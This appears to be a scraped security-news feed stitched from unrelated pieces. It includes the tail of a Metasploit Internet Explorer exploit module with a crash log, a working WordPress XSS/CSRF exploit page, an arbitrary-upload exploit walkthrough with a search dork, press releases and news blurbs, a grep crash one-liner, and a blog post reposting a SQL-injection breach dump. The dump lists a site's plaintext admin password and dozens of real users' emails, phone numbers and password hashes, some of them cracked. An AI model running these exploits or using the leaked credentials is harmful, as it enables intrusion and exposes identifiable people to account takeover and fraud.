    <dfn id="b">
    </dfn>
    </body>
    </html>
    |

    return html
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")

    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    html = load_exploit_html(my_target, cli)
    html = html.gsub(/^\t\t/, '')
    print_status("Sending HTML...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

end


=begin
(87c.f40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!CMarkup::OnLoadStatusDone+0x504:
637848c3 ff90dc000000    call    dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????
0:008> k
ChildEBP RetAddr
020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504
020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47
020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f
020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12
020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb
020bfd78 7e418734 mshtml!GlobalWndProc+0x183
020bfda4 7e418816 USER32!InternalCallWinProc+0x28
020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150
020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306
020bfe7c 01252ec9 USER32!DispatchMessageW+0xf
020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461
020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1
020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab
020bffec 00000000 kernel32!BaseThreadStart+0x37

0:008> r
eax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CMarkup::OnLoadStatusDone+0x504:
637848c3 ff90dc000000    call    dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????

=end

Credit:  Eric Romang, sinn3r, juan vazquez, mahmud ab rahman

EMCO Software announces launching of a new version of its EMCO Ping Monitor software designed for tracking availability of network hosts. The new version is compatible with Windows 8.


EMCO Ping Monitor 4.7 running on Windows 8
The new version of the application is compatible with Windows 8 and Windows Server 2012, including both the x86 and x64 versions of these platforms.
San Francisco, CA (PRWEB) December 31, 2012

EMCO Software, a leading provider of network monitoring software for Windows, has announced the availability of EMCO Ping Monitor version 4.7.14. The new version of the application is compatible with Windows 8 and Windows Server 2012, including both the x86 and x64 versions of these platforms. EMCO Ping Monitor is a .NET application that is now compatible with .NET Framework version 4.5 included into the latest Windows releases.
EMCO Ping Monitor is ping monitoring software designed to help network administrators and IT professionals to monitor the availability of network hosts. It uses ICMP pings to check statuses of the monitored network connections. The application is designed to work in the 24/7 mode to track statuses of multiple network connections simultaneously. If a connection is lost or restored, the application can notify the network administrators using various notification methods including e-mail, Windows System Tray, sound and other types of notifications. In addition to tracking network connection statuses, the application also collects and displays information about the connection response time and the connection stability using the metrics available for the ICMP protocol.
Network administrators can easily integrate EMCO Ping Monitor with other administrative tools by using the custom actions functionality provided by the application. The application can work as a host monitor that executes predefined custom actions when the connection to a host is lost or restored. Network administrators can configure the application to execute any utility or script as a custom action and pass to it the parameters that define the connection state. For example, the application can be integrated with an external SMS system to send SMS notifications to different recipients when the monitored connections are lost or restored.
"EMCO Ping Monitor version 4.7.14 is ready to work in enterprise environments. Network administrators can install it on their server machines, including Windows Server 2012, to run the application in the 24/7 mode and track statuses of important network connections. A single copy of the application can monitor over a thousand connections simultaneously when started on a typical modern PC", Thorarinn Oskarsson, CEO at EMCO Software, says.
In addition supporting Windows 8 and Windows Server 2012, the latest version of the application includes a number of new and improved features. The most important improvements include the options to group, sort and filter the displayed hosts by different parameters. In particular, network administrators using the latest version of the application can group, sort and filter hosts by their connection statuses to display the hosts with failed connections only.
Pricing and Availability
EMCO Ping Monitor is available in two editions. The Free edition is free for personal and commercial usage. It allows monitoring up to 5 network connections. The Professional edition is commercial software that allows monitoring an unlimited number of network connections. Both editions can be downloaded without registration at http://emcosoftware.com/ping-monitor. A license for the Professional edition costs $49 for one copy of the application.
About EMCO Software
EMCO Software is a provider of integrated software solutions that help organizations to reinvent approaches to their computer networks management. EMCO Software award-winning products enable organizations to manage their IT environments remotely and automate their network administration procedures, including network inventory, software deployment, power management, and network & security control. Founded in 2001, EMCO Software is headquartered in Reykjavik, Iceland, with operations around the globe. Today, more than 20,000 organizations in 85 countries, including Fortune 100 and Fortune 500 companies, trust EMCO Software products. For more information, visit http://emcosoftware.com.

# Exploit Title: Word Press Photo Plus, Photo Search XSS/CSRF Vulnerability
# Google Dork:
# Date: 29/12/12
# Exploit Author: k3170makan
# Vendor Homepage: http://wordpress.org/extend/plugins/wp-photo-album-plus/
# Software Link: http://wordpress.org/extend/plugins/wp-photo-album-plus/
# Version: 4.8.11
# Tested on: Ubuntu 10.04
Word Press Photo Plus plugin suffers from a XSS/CSRF via Vulnerability in
the "Search Photos" function

Code:
extract from wp-photo-album-plus.php, in widget function
--------------------------------------------------------------------------------------------------------------------------------
 42          <form id="wppa_searchform" action="<?php echo($pagelink) ?>"
method="post" class="widget_search">
 43             <div>
 44                <?php echo $instance['label'] ?>
 45                <input type="text" name="wppa-searchstring" id="wppa_s"
value="<?php echo $wppa[    'searchstring'] ?>" />
 46                <input id = "wppa_searchsubmit" type="submit"
value="<?php _e('Search', 'wppa');     ?>" />
 47             </div>
---------------------------------------------------------------------------------------------------------------------------------
The above code fails to sanitize the $wppa['searchstring'] variable,
allowing attacks to inject harmfull HTML elements and JavaScript code.
Submissions to this form can also be made from any domain, which actually
aids in the exploitation of the vulnerability thus this is classified as a
CSRF Vulnerability

Exploit Code:
The exploit requires an attacker to forge a post request to this form, this
can be done by using the following html page
--------------------------------------------------------------------------------------------------------------------------------
  1 <html>
  2 <body onload="xss()">
  3 <form name="f" id="wppa_searchform" action="http://[domain name]/[photo
search page path]" method="post" class="widget_search">
  4 <input type="text" name="wppa-searchstring" id="wppa_s"
value='"><script>alert(1);</script><textarea>'>
  5 <input name="s" id="wppa_searchsubmit" type="submit" value="Search">
  6 </form>
  7 <script>
  8 function xss(){
  9    document.f.s.click();
 10 }
 11 </script>
 12 <body>
 13 <html>
--------------------------------------------------------------------------------------------------------------------------------
[photo search page path] can be obtained by reading the path set in the
original photo search form attributes
--
<Keith k3170makan <http://about.me/k3170makan> Makan/>

Private Internet Access’ new Privileges VPN Product brings military grade security to consumers throughout the world. Through their new educational campaign and informational video release, Internet users everywhere will learn the importance of secure browsing on public Wi-Fi on the world class VPN service.


Private Internet Access™ launches Privileges VPN Product.
(PRWEB) December 31, 2012

Featuring military grade security, Private Internet Access’ is now offering their new Privileges VPN Product featuring their world-class VPN service to consumers worldwide. In an effort to educate people about the importance of secure browsing, Private Internet Access’ new educational campaign sheds light on identity theft through an informational video explaining how the new their VPN service and new Privileges VPN Product can help protect an Internet user’s privacy.
Private Internet Access’ new Privileges VPN Product application features a user-friendly interface that takes only two clicks to directly connect. New features also include increased bandwidth that decreases the latency for users all around the globe.
"Our application of privacy and security layers is the most effective solution to the problems users, like you and I, face today. The Internet is a powerful tool which, if used for good, produces diverse innovations, new cultures, accelerated education, new technologies, and, in short, prosperity. Historians like to label each time period as defined by the technology which had the most dramatic impact on the peoples of the time period. Our privacy and security are both very important and should be safe guarded in order to maintain integrity and freedom in our society as well as prosperity and diversity," says a representative of Private Internet Access.
Through their new educational campaign and informational video, Private Internet Access’ mission is to inform all Internet users as to why having Wi-Fi security is critical while using Public Wi-Fi. To ensure the safest browsing, the Privileges VPN Product has military grade security that uses the latest cutting edge technology and encryption developed by Private Internet Access for the utmost customer security while using their https VPN Service.
“Data logging while consumers are using unencrypted Public Wi-Fi is a leading cause of identity theft,” says Will of London Trust Media. “Encrypting data while using Public Wi-Fi is critical for user security.”
Private Internet Access’s world class VPN Service has 17+ locations worldwide ensuring the fastest connection possible for all users from the most trusted name in anonymous VPN Service. Users may browse anonymously with a hidden IP, and enable Wi-Fi security with their VPN service containing anonymous VPN tunnels that protect privacy.
To start anonymously browsing immediately visit https://www.privateinternetaccess.com/
Click here to view informational video.
About Private Internet Access
Private Internet Access is the leading VPN Service provider specializing in secure, encrypted VPN tunnels which create several layers of privacy and security providing you safety on the internet. The VPN Service is backed by London Trust Media, Inc., and uses multiple gateways worldwide with VPN Tunnel access throughout the world. Private Internet Access is the solution to privacy and security on the Internet providing a secure virtual private network tunnel between users and servers with super strong encryption.

Britain is losing the war on internet crime, a leading police officer has admitted, after it emerged that cyber crime cost UK businesses around £205 million in lost revenue last year.

Commissioner Adrian Leppard, head of City of London Police, said online fraud was rising “exponentially”, with the largest number of attacks originating from Eastern Europe and Russia.
In a stark warning to MPs earlier this month, he said police were struggling to keep up with increasingly sophisticated internet criminals.

read more..........http://www.telegraph.co.uk/news/uknews/crime/9771627/Britain-losing-the-war-on-cyber-crime-as-costs-hit-205-million.html?utm_source=twitterfeed&utm_medium=twitter

# Exploit Title: WordPress SB Uploader 3.9 Arbitrary File Upload Vulnerability
# Exploit Author: Evil aXe
# http://www.facebook.com/iChocolate.lips
# Date: 30/12/12
# Greetz: R3x0Man, Shadman tanjim, Shahee Mirza, JingoBD, ManInDark And All Crew and Members of Bangladesh Cyber Army.
# Software Link: http://wordpress.org/extend/plugins/sb-uploader/
# Version: 3.9
# Category: webapps
# Tested on: [Windows 7]
# Google Dork : "inurl:plugins/sb-uploader"

=====================
Vulnerability : Arbitrary File Upload Vulnerability
=====================
Exploit Details :
=====================

1. Register
2. Login [Confirm your email then login]
3. Add a New post
4. Write title,body something what you want :)
5. Look at the Right slidbar " SB Uploader" panel and upload your file :)
6. Publish the post
7. You file is uploaded here : /wp/wp-content/uploads/2012/02/yourfile[.]ext

=====================
p0c: localhost/wp/wp-content/uploads/2012/12/cOol.htm
=====================
♥ BCA ♥

Noida police has instructed 70 internet café owners to install new software in their computers to prevent cyber crime. This is being done with the view of ensuring cyber security in the city.
Noida police in partnership with Ideacts innovation launched the software ‘iCafe Manager' on December 30 as a move to curb cyber crimes. The internet cafes in Noida can obtain this software for free.
The DSP (crime), Triveni Singh said that it is a step to make sure cyber management and security in the city and the café owners can play their part in maintaining national security.

read more.............http://www.gizbot.com/social-media/noida-police-introduces-new-software-check-cybercrimes-009686.html

Muscat -
Every second, 14 persons become victims of cyber crimes worldwide; in 2011 4mn people were affected by the offence across the globe, said Dr Salim Sultan al Ruzaiqi, CEO of Information Technology Authority (ITA).

He was addressing a gathering at the Organisation of Islamic Cooperation-Computer Emergency Response Team's (OIC-CERT) annual conference on Sunday. “This year, many oil and gas companies in the region have been targeted, obstructing business,” he added.

The one-day conference was organised by ITA in cooperation with Oman's National Computer Emergency Readiness Team (OCERT) under the patronage of H E Dr Abdullah bin Mohammed bin Said al Saeedi, the Minister of Legal Affairs. It was also attended by Ali bin Masoud al Sunaidy, ITA board chairman and delegates from more than 55 countries.

Experts discussed cyber security against emerging threats and called regional alliances for possible partnership and collaboration.

read more...........http://www.muscatdaily.com/Archive/Oman/Cyber-crimes-affect-14-persons-every-second-says-ITA-CEO-1xvs

I just wanted to wish all readers and their families a happy, healthy and prosperous New Year! As always thank you for taking the time out to read this blog as I hope you find it informative, educational, engaging and helpful so that you can take the necessary countermeasures to protect your critical data. Stay safe out there, try and be a bit more selfless as opposed to selfish and live each day as if it were your last so that you never have any regrets!

Best & Happy New Year
Bradley Sean Susser

Grep <2.11 is vulnerable to int overflow exploitation.

http://lists.gnu.org/archive/html/bug-grep/2012-03/msg00007.html

Although it is patched in the recent Grep,
This update has not been pushed to the Ubuntu repos, or the Redhat
repos, leaving 99% of those OS's(and more) vulnerable.


There are also many other ways to do this bug.

It is low severity because it would be extremely hard to actually
exploit it, and it is a local exploit, and it is not run by root.

Found By: Security Researcher - Joshua Rogers


More:
https://bugzilla.redhat.com/show_bug.cgi?id=889935
https://bugs.launchpad.net/ubuntu/+source/grep/+bug/1091473
http://seclists.org/oss-sec/2012/q4/504
etc.

#There are many ways of doing this.

#Method one:
$ perl -e 'print "x"x(2**31)' | grep x > /dev/null
Segmentation fault (core dumped)


#Method two:
$ perl -e 'print "\nx"x(2**31)' | grep -c x > /dev/null


Twitter: https://twitter.com/MegaManSec


CVE: CVE-2012-5667
--
*Joshua Rogers* - Retro Game Collector && IT Security Specialist
gpg pubkey <http://www.internot.info/docs/gpg_pubkey.asc.gpg>

As always this information is for educational purposes. We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the casansaar.com exploit .Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,

The Breach is provided below as I will continue to monitor the net to safeguard systems and individuals critical data. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act. Please do your part in helping to inform those who have been exploited as you would want others to notify you if your critical data had been compromised. Karma!



======================================================================
|||||||| ||   || |||||||  |||||||| ||   ||  |||||||| ||||||| |||||||
   ||    ||...|| ||    ||  ||||     ||    ||      ||
   ||    ||...|| ||||     ||  |||||||     ||    ||||    ||||
   ||    ||   || ||          ||    ||   ||     ||    ||      ||
   ||    ||   || |||||||     ||    ||   ||  |||||||| ||||||| ||
======================================================================

==========================================
Vulnerability Tested By The Thief
==========================================


Database: casansaa_ca
[95 tables]
+---------------------------+
| admin                     |
| articles                  |
| articles_comment          |
| category                  |
| chat                      |
| country                   |
| file_icon                 |
| files                     |
| files_comment             |
| functional_area           |
| home_page                 |
| job_resume                |
| jobs_details              |
| location                  |
| matri                     |
| news                      |
| news_comment              |
| pay_scale                 |
| qualification             |
| query_solved              |
| states                    |
| tbl_abouts                |
| tbl_age                   |
| tbl_became_expert         |
| tbl_book                  |
| tbl_calendar              |
| tbl_city                  |
| tbl_classified            |
| tbl_classified_category   |
| tbl_classified_comment    |
| tbl_classified_scrollar   |
| tbl_coaching_category     |
| tbl_coaching_center       |
| tbl_com_category          |
| tbl_com_tophic            |
| tbl_com_topic_start       |
| tbl_community             |
| tbl_community_member      |
| tbl_community_scrollar    |
| tbl_download_resume       |
| tbl_edirectory_category   |
| tbl_empanelment           |
| tbl_event                 |
| tbl_event_category        |
| tbl_event_comment         |
| tbl_expert                |
| tbl_expert_category       |
| tbl_expert_comment        |
| tbl_expert_reply          |
| tbl_file_category         |
| tbl_firm_branch           |
| tbl_firm_scrollar         |
| tbl_firm_services         |
| tbl_forum                 |
| tbl_forum_category        |
| tbl_forum_massage         |
| tbl_forum_scrollar        |
| tbl_forum_sub_category    |
| tbl_friends               |
| tbl_gotra                 |
| tbl_guest                 |
| tbl_importantlinks        |
| tbl_interview             |
| tbl_job_scrollar          |
| tbl_judiciary             |
| tbl_judiciary_category    |
| tbl_judiciary_comment     |
| tbl_massage               |
| tbl_matrimonial_massage   |
| tbl_matrimonial_scrollar  |
| tbl_metro_money           |
| tbl_metro_money_star      |
| tbl_newslatter            |
| tbl_nofitication_category |
| tbl_notification          |
| tbl_notification_comment  |
| tbl_privacy               |
| tbl_profile_scrollar      |
| tbl_question              |
| tbl_rating                |
| tbl_register_firm         |
| tbl_requirement           |
| tbl_service               |
| tbl_student_category      |
| tbl_student_resume        |
| tbl_student_scrollar      |
| tbl_subservice            |
| tbl_success_story         |
| tbl_testimonial           |
| tbl_tongue                |
| tbl_user_album            |
| tbl_voting                |
| tbl_website_settings      |
| users                     |
| users_online              |
+---------------------------+
Database: casansaa_ca
Table: admin
[2 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| admin_id | varchar(20) |
| password | varchar(30) |
+----------+-------------+

Database: casansaa_ca
Table: admin
[1 entry]
+----------+--------------+
| admin_id | password     |
+----------+--------------+
| saiadmin | v@dl6sj1037k |
+----------+--------------+

Database: casansaa_ca
Table: users
[29 columns]
+---------------------+--------------+
| Column              | Type         |
+---------------------+--------------+
| aboutme             | text         |
| address             | varchar(255) |
| admin_approved      | int(1)       |
| city                | varchar(255) |
| country             | varchar(11)  |
| date_of_birth       | date         |
| designation         | varchar(255) |
| email               | varchar(255) |
| feature_member      | varchar(11)  |
| final_score_card    | int(11)      |
| islogin             | int(1)       |
| login_time          | datetime     |
| mobile              | varchar(255) |
| name                | varchar(100) |
| organization        | varchar(255) |
| other_qualification | varchar(255) |
| password            | varchar(50)  |
| photo               | varchar(100) |
| photothumb          | varchar(255) |
| profile_visist      | int(18)      |
| qualification       | varchar(255) |
| registration_date   | datetime     |
| remote_address      | varchar(255) |
| score_card          | int(11)      |
| state               | varchar(11)  |
| status              | char(1)      |
| userid              | int(11)      |
| username            | varchar(50)  |
| zip                 | varchar(11)  |
+---------------------+--------------+

Database: casansaa_ca
Table: users
[112 entries]
+-------------+---------------------------------+-------------+------------------------+--------------+---------------------+-----------------------------------------------+---------------+--------+---------------------------------+
| designation | email                           | mobile      | name                   | organization | other_qualification | password                                      | qualification | userid | username                        |
+-------------+---------------------------------+-------------+------------------------+--------------+---------------------+-----------------------------------------------+---------------+--------+---------------------------------+
| NULL        | sunilverma105@gmail.com         | 9716454920  | Sunil Verma            | NULL         | B.Tech              | e10adc3949ba59abbe56e057f20f883e (123456)     | Others        | 1      | gnpandey                        |
| NULL        | carajdel@gmail.com              | NULL        | May I Help You.        | NULL         | NULL                | e10adc3949ba59abbe56e057f20f883e (123456)     | 1             | 7      | carajdel                        |
| NULL        | raj6136@yahoo.com               | NULL        | Raj                    | NULL         | NULL                | e10adc3949ba59abbe56e057f20f883e (123456)     | 1             | 8      | raj6136                         |
| NULL        | caanitaarora@gmail.com          | NULL        | AnitaArora             | NULL         | NULL                | 94a21e06f4a0609c7b87cac9f4873a3c (saibaba)    | 1             | 22     | AnitaArora22                    |
| NULL        | cafromdelhi@gmail.com           | NULL        | VK                     | NULL         | NULL                | d4c0796d669e1b02e36fb665194dc3dc              | 1             | 23     | cafromdelhi                     |
| NULL        | csguptadel@gmail.com            | NULL        | P.Gupta                | NULL         | NULL                | d4c0796d669e1b02e36fb665194dc3dc              | 2             | 24     | csguptadel                      |
| NULL        | ca_121@yahoo.com                | NULL        | caindelhi              | NULL         | NULL                | 2f3d0072cce8890089c1332c21875ffb (jaimatadi)  | 1             | 27     | ca_121@yahoo.com                |
| NULL        | solankica@yahoo.com             | NULL        | Solanki                | NULL         | NULL                | f884b605a739a622dd0810007cc1e66c              | 1             | 28     | solankica@yahoo.com             |
| NULL        | ca.aggarwal2011@yahoo.in        | NULL        | Y Aggarwal             | NULL         | NULL                | f884b605a739a622dd0810007cc1e66c              | 1             | 29     | ca.aggarwal2011@yahoo.in        |
| NULL        | d.sharma12@sify.com             | NULL        | D Sharma               | NULL         | NULL                | 920001c5a0cc903cbcb81c37d128c76e (saibaba1)   | 1             | 30     | d.sharma12@sify.com             |
| NULL        | caaggarwal57@yahoo.com          | NULL        | Y Aggarwal             | NULL         | NULL                | f884b605a739a622dd0810007cc1e66c              | 1             | 32     | caaggarwal57@yahoo.com          |
| NULL        | ca.ranjanasoni@yahoo.com        | 9855200619  | Ranjana Soni           | NULL         | NULL                | d939d2c6ba8215f4fdc92b387a4baf5f              | 1             | 33     | ranjanasoni                     |
| NULL        | omnamo_com@yahoo.com            | 9811639395  | PARUL JAIN             | NULL         | NULL                | f8962e81ac765fcb06b43ff7052ba968              | 1             | 35     | paruljain                       |
| NULL        | ltkarora16@gmail.com            | NULL        | Latika Arora           | NULL         | NULL                | c00034f9175b226213c0ade90f86a1aa              | 5             | 36     | Latika                          |
| NULL        | pawan.sethi@icai.org            | NULL        | CA PAWAN SETHI         | NULL         | NULL                | ce6218b2daf4313b055fedb725d4934e              | 1             | 38     | capawan                         |
| NULL        | rahul.sahi52@gmail.com          | 9988113891  | Rahul Sahi             | NULL         | NULL                | cbae5c88540cb6232b5cfe4a01812a20 (jaypee123)  | 1             | 39     | Rahulsahi                       |
| NULL        | caadhiraj@gmail.com             | 9466031067  | CA ADHIRAJ             | NULL         | NULL                | 0ecb957df52089ce14087c92631e6fcf              | 1             | 40     | adhiraj                         |
| NULL        | aries.prashant007@gmail.com     | 9717380587  | Prashant subedi        | NULL         | NULL                | 2959882ea7ae4f05383aaafdea65794c              | 5             | 41     | prashantsubedi                  |
| NULL        | gaganca2010@gmail.com           | 9814943060  | Gagandeep Singh        | NULL         | NULL                | f091937364c7a422c6f6740e0feef7dc              | 1             | 42     | gaganca2010@gmail.com           |
| NULL        | karnpravin@gmail.com            | 9650844214  | pravin kumar karn      | NULL         | NULL                | 7db6a2e3c6dd7511fda71154804546bb              | 1             | 43     | karnpravin                      |
| NULL        | ritesh.tayal159@hotmail.com     | 9015455695  | Ritesh Kumar           | NULL         | NULL                | 0b54156a947d6b4ed099f859f00c3d25              | 1             | 44     | ritesh.tayal159@hotmail.com     |
| NULL        | ca.amitagarwal1984@gmail.com    | 9717997554  | Amit Agarwal           | NULL         | NULL                | d6da5db7061467485a5ff00a8e0797ee              | 1             | 45     | amit.agarwal84                  |
| NULL        | cadeepakarora2009@gmail.com     | 9872672627  | Deepak                 | NULL         | NULL                | 7806dd4c12b7bf55f6973461b82364e7              | 1             | 46     | deepak2903                      |
| NULL        | carajeevbansal@yahoo.com        | 9315528081  | CA. Rajeev Bansal      | NULL         | NULL                | 0a9b90d23b46f6cad5d3672c33b5b7cc              | 1             | 47     | carajeevbansal                  |
| NULL        | caramanshahi@gmail.com          | 9815536372  | raman                  | NULL         | NULL                | 8a4f253f50dbffcc82a9cdbe818e703f              | 1             | 48     | caramanshahi                    |
| NULL        | harishashuja07@yahoo.co.in      | 9466785511  | Harish Kumar           | NULL         | NULL                | 9fcfd62c457e39428a55bd0986cfb429              | 1             | 49     | HarishKumar1                    |
| NULL        | caanmolrana@gmail.com           | 9899810268  | Anmol Rana             | NULL         | NULL                | 430f7138feadc8358761615f753ae43e              | 1             | 50     | AnmolRana1                      |
| NULL        | sachin1979_ca@yahoo.co.in       | 9873304840  | SACHIN KHANDELWAL      | NULL         | NULL                | 1c6586bf96c9ffb69f1d5e19f416e848              | 1             | 51     | sachinkhandelwal1               |
| NULL        | amar.p.ca1@gmail.com            | 9717105008  | AP Chowdhary           | NULL         | NULL                | 57bb0f8d2e4959f2326f879920b5a71b              | 1             | 52     | Amar                            |
| NULL        | ashishbhatt07@yahoo.com         | 9911760071  | Ashish Bhatt           | NULL         | NULL                | 9c0ac72c24645cbfdf18570d809a3cb8              | 5             | 54     | ashishbhatt07@yahoo.com         |
| NULL        | dknavatakke@rediffmail.com      | 9422071170  | CA Deepak Navatakke    | NULL         | NULL                | 1a9c54f805e9e4806444bf5b5d775517              | 1             | 55     | rushi2181                       |
| NULL        | anuradha.s.singh12@gmail.com    | 9822569068  | anuradha               | NULL         | NULL                | e34341c325cdfaebef2b08429f66346a              | 5             | 56     | anuradhasingh1                  |
| NULL        | namansingla69@yahoo.com         | NULL        | naman singla           | NULL         | NULL                | d627be2c659ed622ec43f6354434a491              | 1             | 57     | naman                           |
| NULL        | vinayak_beenu18@hotmail.com     | 9810705886  | vinayak gupta          | NULL         | NULL                | b6c2791a235dfc8eb124e031a28c7bd1              | 1             | 58     | vinayak_beenu18                 |
| NULL        | tadi.agarwalvertika@gmail.com   | 9571213121  | vertika                | NULL         | NULL                | 0576c2ebbcd0737f697f9d9a58fc92a4              | 3             | 59     | vertikaagarwal1                 |
| NULL        | nitinsgrover@gmail.com          | 9582009494  | Nitin Grover           | NULL         | NULL                | a50bf8e7152669a09cf7e56ae8fc11e3              | 2             | 60     | nitinsgrover                    |
| NULL        | skb_ca2005@rediffmail.com       | 9811058992  | sumati kumar bhatera   | NULL         | NULL                | 4ae2533d3281ed3b98e93bd7c836c5f7              | 1             | 61     | sumatikumar                     |
| NULL        | fcabajrangjain@gmail.com        | 9215150027  | LAL MITTAL & COMPANY   | NULL         | NULL                | afe04f054af05ae89ed35100faa4b39d              | 1             | 62     | BAJRANGLALJAIN                  |
| NULL        | mgaba_19@yahoo.in               | 9888870727  | mohit gaba             | NULL         | NULL                | a46af84e3b42648f240f99f201bcb427              | 1             | 63     | mohit                           |
| NULL        | mohitbansalca@gmail.com         | 9810550050  | mohit bansal           | NULL         | NULL                | c68ad910ed49ac65f21f1bf2c5dbf912 (parents)    | 1             | 64     | mohitbansalca                   |
| NULL        | mital_saurabh680@yahoo.co.in    | 0989768018  | CA Saurabh Mittal      | NULL         | NULL                | e53dac6178d0b09c0d00bc819a34efad              | 1             | 65     | SaurabhMittal1                  |
| NULL        | rpratap1983@yahoo.co.in         | 9891017907  | CA. Raghavendra Pratap | NULL         | NULL                | 6dc8e7344a37c82b2791bcd002ff5200              | 1             | 66     | rpratap1983                     |
| NULL        | vishal.adhiya@gmail.com         | NULL        | Vishal C Adhiya        | NULL         | NULL                | cc3f7c718d192dd3638d18a98f8acd07              | 1             | 67     | vishal.adhiya                   |
| NULL        | veenu_jain57@yahoo.com          | 9872695057  | Veenu Jain             | NULL         | NULL                | ab92ad079bc48bb2294a9d4725a876c9              | 5             | 69     | VeenuJain                       |
| NULL        | prateeksinghal90@gmail.com      | 9999764269  | Prateek Singhal        | NULL         | NULL                | c0f7fa032acbd4ef1bc334f12dd7bd28              | 5             | 70     | prateek                         |
| NULL        | cagautam2009@gmail.com          | 9891580528  | GAUTAM GOYAL           | NULL         | NULL                | 059c941f80b1d1b36895566ec250fd5b              | 1             | 71     | cagautamgoyal                   |
| NULL        | ca.manish@rediffmail.com        | 9873551319  | MANISH SHARMA          | NULL         | NULL                | ea9f8bec9bba47c5efff3d0b46728331              | 1             | 72     | ca.manish                       |
| NULL        | cakrishnadelhi1@gmail.com       | 9911170117  | krishna nand dubey     | NULL         | NULL                | 0b8eb689bc4e1a010461e91bcb1807e5              | 1             | 73     | krishnadubey                    |
| NULL        | caopsaraswat@yahoo.com          | 9871771222  | OPS                    | NULL         | NULL                | 243bd1ce0387f18005abfc43b001646a (krishna)    | 1             | 74     | OmPrakashSaraswat               |
| NULL        | carakeshmalik@gmail.com         | 9311501414  | CA.Rakesh Malik        | NULL         | NULL                | 46e43377d69a134330f2980c11c35568              | 1             | 75     | carakeshmalik                   |
| NULL        | ANURAGBAHETY91@GMAIL.COM        | 9883219066  | anurag                 | NULL         | NULL                | ec4afaec5616eb420e55f2c655dc7e79              | 2             | 76     | anurag                          |
| NULL        | caga@icai.org                   | 9711443232  | Gaurav Aggarwal        | NULL         | NULL                | 02dcb3926578bc7c5967a42892044a66              | 1             | 77     | caga                            |
| NULL        | govind.aditya1988@yahoo.com     | 9465323367  | aditya sharma          | NULL         | NULL                | 3e059e4096ed50fb7e3ce55c65da46e3              | 5             | 78     | radhekrishna001                 |
| NULL        | sudhanshu.agrahari@gmail.com    | 9899751545  | Sudhanshu              | NULL         | NULL                | 603291c32d760f8a2c823d7f1674d807              | 1             | 79     | CASudhanshuAgrahari             |
| NULL        | info@rcba.in                    | 9910144223  | Neeraj Agarwal         | NULL         | NULL                | 655019d05efe61da43d5001537f76313              | 1             | 80     | rcba                            |
| NULL        | manishgoel1988@gmail.com        | 9210764907  | manish goel            | NULL         | NULL                | d1ed59b2a84d0ac31b6ff75b7a2bbe7f              | 1             | 81     | manishgoel1988@gmail.com        |
| NULL        | rparoraco@yahoo.in              | 9312435140  | R P Arora              | NULL         | NULL                | f33eac0aef350a7654d60354c1189e9a (205206)     | 1             | 82     | rparoraco                       |
| NULL        | umangjain26@gmail.com           | NULL        | Umang                  | NULL         | NULL                | a08811ba822bc7218232bdc7064f965d              | 1             | 84     | UmangJain                       |
| NULL        | charugulati_89@yahoo.in         | 9910665523  | Charu Gulati           | NULL         | NULL                | 0baf3ba2027e96c95533bbfa4314c193              | 1             | 85     | charugulati                     |
| NULL        | sumangarg16@gmail.com           | NULL        | Suman Garg             | NULL         | NULL                | 099629df77bf205d6889f36d9bbccc1f              | 1             | 86     | SumanGarg                       |
| NULL        | caamit_hajela111@indiatimes.com | 9889520400  | Amit Hajela            | NULL         | NULL                | d8309616f073a8eab45a54bcc354734d              | 1             | 87     | caamit_hajela111@indiatimes.com |
| NULL        | shalini9005@gmail.com           | NULL        | SHALINI SHARMA         | NULL         | NULL                | f318cbd1210ca45f6b31feb9474532aa              | 1             | 88     | shine005                        |
| NULL        | hvcpaonta@gmail.com             | 9418044978  | HARISH KUMAR VAISH     | NULL         | NULL                | e69abc9adfd625f274f9fce5675a2a12 (dolly123)   | 1             | 89     | harish1992                      |
| NULL        | chopravinayca@gmail.com         | 9811195334  | Vinay Chopra           | NULL         | NULL                | fb0b4605eb607c7baa36304f5b351db7              | 1             | 90     | VinayChopra                     |
| NULL        | cadkgarg@yahoo.com              | 9416147889  | Deepak Garg            | NULL         | NULL                | efc95a2bdbb1e7d84ea512e146637079              | 1             | 91     | cadkgarg                        |
| NULL        | sethipan@gmail.com              | NULL        | PANKAJ SETHI           | NULL         | NULL                | dbf9eda948621022aacc9e660c1e00f7              | 1             | 92     | CAPankajSethi                   |
